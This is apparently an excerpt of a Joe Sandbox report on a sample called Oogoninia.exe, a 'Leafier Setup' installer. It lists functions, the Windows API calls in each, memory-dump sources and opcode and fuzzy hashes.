                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1196297422.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1196258164.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1196329175.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1196354573.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$Free$Alloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1780285237-0
                                                                                                                                                                                    • Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                                                                                                                                    • Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                                                                                                                                    • Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62
                                                                                                                                                                                    Function 00404FB9 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(0079DD20,00000000,0078FCF8,766B23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000,?), ref: 00404FF2
                                                                                                                                                                                    • lstrlenA.KERNEL32(0040306B,0079DD20,00000000,0078FCF8,766B23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000), ref: 00405002
                                                                                                                                                                                    • lstrcatA.KERNEL32(0079DD20,0040306B,0040306B,0079DD20,00000000,0078FCF8,766B23A0), ref: 00405015
                                                                                                                                                                                    • SetWindowTextA.USER32(0079DD20,0079DD20), ref: 00405027
                                                                                                                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040504D
                                                                                                                                                                                    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405067
                                                                                                                                                                                    • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405075
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2531174081-0
                                                                                                                                                                                    • Opcode ID: 8aca45e27811aa21f79b642ec133e9ff2e42e250cada4605035ec104fac27bf5
                                                                                                                                                                                    • Instruction ID: d1dd411a73e10bc413e7a6ba64919406d2bbbb657998d141ba589d50d7388124
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8aca45e27811aa21f79b642ec133e9ff2e42e250cada4605035ec104fac27bf5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D214C71900519AADF119FA5DD849DEBFA9EF09354F14807AF944A6290C7398D40CFA8
                                                                                                                                                                                    Function 00404884 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040489F
                                                                                                                                                                                    • GetMessagePos.USER32 ref: 004048A7
                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 004048C1
                                                                                                                                                                                    • SendMessageA.USER32(?,00001111,00000000,?), ref: 004048D3
                                                                                                                                                                                    • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004048F9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                                                                    • String ID: f
                                                                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                                                                    • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                                                                                                                    • Instruction ID: 53a3bc3e7d347c8b02fcccb5944648bd46d0fd351ff65b71f1969629af7e9ac2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 12019275D00219BAEB00DBA5DC41BFEBBBCAF55711F10412BBA00B71D0C7B469018BA5
                                                                                                                                                                                    Function 00402C13 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C2E
                                                                                                                                                                                    • MulDiv.KERNEL32(00099554,00000064,0009AAE8), ref: 00402C59
                                                                                                                                                                                    • wsprintfA.USER32 ref: 00402C69
                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00402C79
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402C8B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • verifying installer: %d%%, xrefs: 00402C63
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                                                                    • Opcode ID: 3ae07b054ad9b81f5b6108b272be1fee9de0c5ac9c6f7af5c303f160919c41b2
                                                                                                                                                                                    • Instruction ID: 21607a1dc9e24acd8111b7ab95824f47c5a1c8f1a2671c4e1062bfa223269d08
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ae07b054ad9b81f5b6108b272be1fee9de0c5ac9c6f7af5c303f160919c41b2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B014F70944209FBEF209F60DD4AEAE37A9AB04304F008039FA16A92D0D7B89951CB59
                                                                                                                                                                                    Function 00402749 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00030000,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027B9
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 004027F2
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402805
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040281D
                                                                                                                                                                                    • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402831
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2667972263-0
                                                                                                                                                                                    • Opcode ID: bd817bc7a5230683892e3683ec6d2df01fe810dda785156d5253b7aae5e8edff
                                                                                                                                                                                    • Instruction ID: ecef423f8b7fb5116dd0415946ee68b484c5f893cd0af9153c7a5222f957d578
                                                                                                                                                                                    • Opcode Fuzzy Hash: bd817bc7a5230683892e3683ec6d2df01fe810dda785156d5253b7aae5e8edff
                                                                                                                                                                                    • Instruction Fuzzy Hash: B921AE71C00128BBCF216FA5CE49D9E7E79EF09324F14423AF511762D0C6794D419FA9
                                                                                                                                                                                    Function 0040477A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404695,000000DF,00000000,00000400,?), ref: 00404818
                                                                                                                                                                                    • wsprintfA.USER32 ref: 00404820
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,0079E540), ref: 00404833
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                    • String ID: %u.%u%s%s$@y
                                                                                                                                                                                    • API String ID: 3540041739-3020698753
                                                                                                                                                                                    • Opcode ID: ca56fcb4ff96a92767a948c37e1cdc386e941f7d7930a18b2193be96cb950031
                                                                                                                                                                                    • Instruction ID: 9c2068d9445a5b6f252536eabbf1c91049bb0fb02782bdd1491d607ad1f2c465
                                                                                                                                                                                    • Opcode Fuzzy Hash: ca56fcb4ff96a92767a948c37e1cdc386e941f7d7930a18b2193be96cb950031
                                                                                                                                                                                    • Instruction Fuzzy Hash: E711E773A041283BDB0065699C45EAF3698DB86334F254237FA25F31D1EA78CC1182E9
                                                                                                                                                                                    Function 00401D3B Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?), ref: 00401D3F
                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D4C
                                                                                                                                                                                    • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401D8A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                                                                    • Opcode ID: 978bdc3de84591c5b34c529a30ac5b154b9d899f544855d7d9a99db957ba7817
                                                                                                                                                                                    • Instruction ID: b8adc288744d91ba617009adb3e02bef21eb0d6e3f954176feac09388768b409
                                                                                                                                                                                    • Opcode Fuzzy Hash: 978bdc3de84591c5b34c529a30ac5b154b9d899f544855d7d9a99db957ba7817
                                                                                                                                                                                    • Instruction Fuzzy Hash: 45F0FFB2A04119BFE701EBA4DE88DAFB7BCEB44301B104466F601F2191C7749D018B79
                                                                                                                                                                                    Function 00401C04 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                                                                    • String ID: !
                                                                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                                                                    • Opcode ID: 182774ec21bf90fa89628062bdc31045ec8b3e2a1ef169624933301e1dab061d
                                                                                                                                                                                    • Instruction ID: 44e87a32571ed3235eb7b96b36fbe9a42cad9ebb5189372230b031547819aef2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 182774ec21bf90fa89628062bdc31045ec8b3e2a1ef169624933301e1dab061d
                                                                                                                                                                                    • Instruction Fuzzy Hash: ED21A271E44208BEEB15EFA4DA46AED7FB1EF84314F24403EF101B61D1DA788640DB28
                                                                                                                                                                                    Function 004039E5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetWindowTextA.USER32(00000000,Leafier Setup), ref: 00403A7D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: TextWindow
                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\Oogoninia.exe"$1033$Leafier Setup
